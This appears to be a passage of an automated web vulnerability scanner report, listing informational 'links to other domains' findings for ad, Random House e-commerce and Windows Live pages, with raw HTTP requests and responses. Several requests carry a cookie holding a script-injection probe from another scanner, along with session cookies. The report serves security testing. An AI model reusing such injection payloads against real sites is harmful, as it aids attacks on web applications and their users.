<A HREF="http://adx.adnxs.com/mapuid?member=181&amp;user=CAESEAYDROJIBlXAxjjwOAYYXzI&amp;cver=1">here</A>
...[SNIP]...

19.38. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /lar/v10-003/d7/jsc/flr.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /lar/v10-003/d7/jsc/flr.js?n=1302&c=62&s=5&d=9&w=300&h=250&l=[INSERT_CLICK_TRACKER_URL]&z=184568085 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZFFAbh=845B826,20|798_845#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "7140dca9-4239-48dea89497900"
Vary: Accept-Encoding
X-Varnish: 2551699253
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=444
Date: Tue, 26 Apr 2011 18:45:30 GMT
Connection: close
Content-Length: 2750

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=5;var zzPat='';

var zzhasAd;


               var zzStr = "
...[SNIP]...
</span>")
document.write('<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" WIDTH="300" HEIGHT="250">');
document.write('<PARAM NAME="movie" VALUE="http://d3.zedo.com//OzoDB/7/9/933117/V1/300x250_7065jx_sen_lum_vtg.swf?clickTAG=http://yads.zedo.com/ads2/c%3Fa=933117%3Bn=1302%3Bx=2333%3Bc=1302000062,1
...[SNIP]...

19.39. http://ecommerce.randomhouse.com/cart.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecommerce.randomhouse.com
Path:   /cart.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cart.do?from=randomhouse HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:22 GMT
Server: Apache
Set-Cookie: JSESSIONID=99AF3E637ECB1D69552DA7E98D58C60F.ecommerce_wrk1; Path=/
Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19400


<!-- shoppingCart.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://randomhouse.122.2o7.net/b/ss/ranhdev/1/H.17--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...
<div style="text-align:right;margin-right:26px;">
       <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en" onClick="return rh_js_PopWin('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en','VerisignLogo','width=550,height=450,resizable=1,scrollbars=1,toolbar=0,status=0,menubar=0');"><img src="store/images/rh/verisignlogo.gif" border="0" alt="Verisign Logo" />
...[SNIP]...
<div class="rhbw_rfloat">
                       <a href="http://www.bertelsmann.com/"><img src="store/images/rh/bw06/base/foot_logo_bmg.png" alt="Bertelsmann Media Worldwide" />
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
<noscript>
<img src="//secure.quantserve.com/pixel/p-c49Y5WdLV8kPg.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

19.40. https://ecommerce.randomhouse.com//create-address.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //create-address.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET //create-address.do?from=' HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303860175|PC#1303855598284-166145#1366930315|check#true#1303858375; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 23:18:15 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 24044


<!-- createAddress.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/
...[SNIP]...
<div style="text-align:right;margin-right:26px;">
       <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en" onClick="return rh_js_PopWin('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en','VerisignLogo','width=550,height=450,resizable=1,scrollbars=1,toolbar=0,status=0,menubar=0');"><img src="store/images/rh/verisignlogo.gif" border="0" alt="Verisign Logo" />
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
<noscript>
<img src="//secure.quantserve.com/pixel/p-c49Y5WdLV8kPg.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

19.41. https://ecommerce.randomhouse.com//email-password.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //email-password.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET //email-password.do?from=' HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303860175|PC#1303855598284-166145#1366930315|check#true#1303858375; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 23:18:11 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 18043


<!-- updateEmailPassword.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="
...[SNIP]...
<div style="text-align:right;margin-right:26px;">
       <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en" onClick="return rh_js_PopWin('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en','VerisignLogo','width=550,height=450,resizable=1,scrollbars=1,toolbar=0,status=0,menubar=0');"><img src="store/images/rh/verisignlogo.gif" border="0" alt="Verisign Logo" />
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
<noscript>
<img src="//secure.quantserve.com/pixel/p-c49Y5WdLV8kPg.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

19.42. https://ecommerce.randomhouse.com//select-address.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //select-address.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET //select-address.do?from=' HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303860175|PC#1303855598284-166145#1366930315|check#true#1303858375; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 23:18:15 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16341


<!-- selectAddress.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/
...[SNIP]...
<div style="text-align:right;margin-right:26px;">
       <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en" onClick="return rh_js_PopWin('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en','VerisignLogo','width=550,height=450,resizable=1,scrollbars=1,toolbar=0,status=0,menubar=0');"><img src="store/images/rh/verisignlogo.gif" border="0" alt="Verisign Logo" />
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
<noscript>
<img src="//secure.quantserve.com/pixel/p-c49Y5WdLV8kPg.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

19.43. https://ecommerce.randomhouse.com//view-orders.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //view-orders.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET //view-orders.do?from=' HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303860175|PC#1303855598284-166145#1366930315|check#true#1303858375; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 23:18:12 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 14600


<!-- orderHistory.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://
...[SNIP]...
<div style="text-align:right;margin-right:26px;">
       <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en" onClick="return rh_js_PopWin('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en','VerisignLogo','width=550,height=450,resizable=1,scrollbars=1,toolbar=0,status=0,menubar=0');"><img src="store/images/rh/verisignlogo.gif" border="0" alt="Verisign Logo" />
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
<noscript>
<img src="//secure.quantserve.com/pixel/p-c49Y5WdLV8kPg.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

19.44. https://ecommerce.randomhouse.com/account.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /account.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /account.do?from=randomhouse HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=30BCBB9743BBB87336047B037BF512BF.ecommerce_wrk1; Path=/; Secure
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16859


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<div style="text-align:right;margin-right:26px;">
       <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en" onClick="return rh_js_PopWin('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en','VerisignLogo','width=550,height=450,resizable=1,scrollbars=1,toolbar=0,status=0,menubar=0');"><img src="store/images/rh/verisignlogo.gif" border="0" alt="Verisign Logo" />
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
<noscript>
<img src="//secure.quantserve.com/pixel/p-c49Y5WdLV8kPg.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

19.45. https://ecommerce.randomhouse.com/create-account.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /create-account.do?from=randomhouse HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:21:11 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 20226


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
<div style="text-align:right;margin-right:26px;">
       <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en" onClick="return rh_js_PopWin('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en','VerisignLogo','width=550,height=450,resizable=1,scrollbars=1,toolbar=0,status=0,menubar=0');"><img src="store/images/rh/verisignlogo.gif" border="0" alt="Verisign Logo" />
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
<noscript>
<img src="//secure.quantserve.com/pixel/p-c49Y5WdLV8kPg.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

19.46. https://ecommerce.randomhouse.com/password.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /password.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /password.do?from= HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:19:40 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 11309


<!-- forgottenPassword.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="htt
...[SNIP]...
<div style="text-align:right;margin-right:26px;">
       <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en" onClick="return rh_js_PopWin('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en','VerisignLogo','width=550,height=450,resizable=1,scrollbars=1,toolbar=0,status=0,menubar=0');"><img src="store/images/rh/verisignlogo.gif" border="0" alt="Verisign Logo" />
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
<noscript>
<img src="//secure.quantserve.com/pixel/p-c49Y5WdLV8kPg.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

19.47. https://ecommerce.randomhouse.com/sign-in.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sign-in.do?from=randomhouse HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/account.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=388CC68FD235E0B3FC2D6F4CD6E761C9.ecommerce_wrk1; SC_LINKS=%5B%5BB%5D%5D; CP=null*; mbox=check#true#1303855669|session#1303855598284-166145#1303857469|PC#1303855598284-166145#1366927609; s_cc=true; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_sq=ranhcorporate%2Cranhrollup%3D%2526pid%253Dsignin%2526pidt%253D1%2526oid%253Dhttps%25253A//ecommerce.randomhouse.com/sign-in.do%25253Ffrom%25253Drandomhouse%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:44 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16851


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<div style="text-align:right;margin-right:26px;">
       <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en" onClick="return rh_js_PopWin('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=ecommerce.randomhouse.com&lang=en','VerisignLogo','width=550,height=450,resizable=1,scrollbars=1,toolbar=0,status=0,menubar=0');"><img src="store/images/rh/verisignlogo.gif" border="0" alt="Verisign Logo" />
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
<noscript>
<img src="//secure.quantserve.com/pixel/p-c49Y5WdLV8kPg.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

19.48. http://explore.live.com/windows-live-messenger  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://explore.live.com
Path:   /windows-live-messenger

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /windows-live-messenger?os=other HTTP/1.1
Host: explore.live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; LD=9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_00381e4a312_15501_1303568379549=L2450|U7591047&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0046b7cd8dc_15501_1303568381496=L1240|U7589087&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0018fbb5ebe_15501_1303567265251=U8722104; wla42=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42292
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Language,Cookie,Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Set-Cookie: xid=42b3abd4-6447-433c-8c48-9965439b3738&&TK2xxxxxxxxLP11&154; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=1623281324&U=&E=&P=&B=en-us; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.explore.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Tue, 26-Apr-2011 16:58:38 GMT; path=/
Set-Cookie: wlexpid=42b3abd4-6447-433c-8c48-9965439b3738; domain=.live.com; expires=Tue, 26-Apr-2011 19:08:38 GMT; path=/
Set-Cookie: wlv=A|_-d:s*ro49Bg.2+1+0+3; domain=.live.com; path=/
Set-Cookie: E=P:dHXjSljSzYg=:lte5DPYyGosUE7/z2qmjFVvinU2K9vatIhifomCYPC4=:F; domain=.live.com; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 03-May-2011 18:38:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:38:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...
</script>
<link rel="StyleSheet" href="http://css.wlxrs.com/XnrQCchPX836L3fVH!R!gdRSMcPIBVjfR6XaI18gTvzYJwuQTeykwke-n449cAvVJ1bpcMFoehazL9jmhlahZg/Base/15.40.1211/NYKpPzcj59cwlx_base.css?ZfDHJ0dwkwrfIMoja3-R7w" type="text/css"/><style id="themecss" type="text/css">
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html&#59;charset&#61;utf-8"/>
<link rel="icon" href="http&#58;//secure.wlxrs.com/&#36;live.controls.images/m/flag.ico" type="image/x-icon" />


<script type="text/javascript">
...[SNIP]...
<span style="clip: rect(8px 18px 24px 0px);left:0px;top:-8px;"><img src="http&#58;//secure.wlxrs.com/&#36;live.controls.images/h/s7.png" alt="Windows Live" /></span>
...[SNIP]...
<li class="linklist">
<a href="http://go.microsoft.com/fwlink/?LinkID=204612" class="navigationLink" id="pageContainer3_ID0EBDBBFBBDBA">Looking for a webcam?</a>
...[SNIP]...
<div id="atdmt" style="display:none">
<script src="https://view.atdmt.com/jaction/ELMessengerenUS" type="text/javascript"></script>
<noscript>
<iframe src="https://view.atdmt.com/iaction/ELMessengerenUS" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<li><a id="uxp_ftr_link_legal" target="_top" href="http&#58;//g.msn.com/0TO_/enus">Terms</a></li>
           <li><a id="uxp_ftr_link_privacy" target="_top" href="http&#58;//go.microsoft.com/fwlink/&#63;LinkId&#61;74170">Privacy</a></li><li><a id="uxp_ftr_link_aboutads" target="_top" href="http&#58;//g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http&#58;//secure.wlxrs.com/&#36;live.controls.images/h/s7.png);background-position:-94px -8px;width:16px;height:16px;" src="http&#58;//secure.wlxrs.com/&#36;live.controls.images/is/invis.gif" alt=""/></span>
...[SNIP]...
<span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http&#58;//secure.wlxrs.com/&#36;live.controls.images/h/s7.png);background-position:-62px -8px;width:16px;height:16px;" src="http&#58;//secure.wlxrs.com/&#36;live.controls.images/is/invis.gif" alt=""/></span>
...[SNIP]...
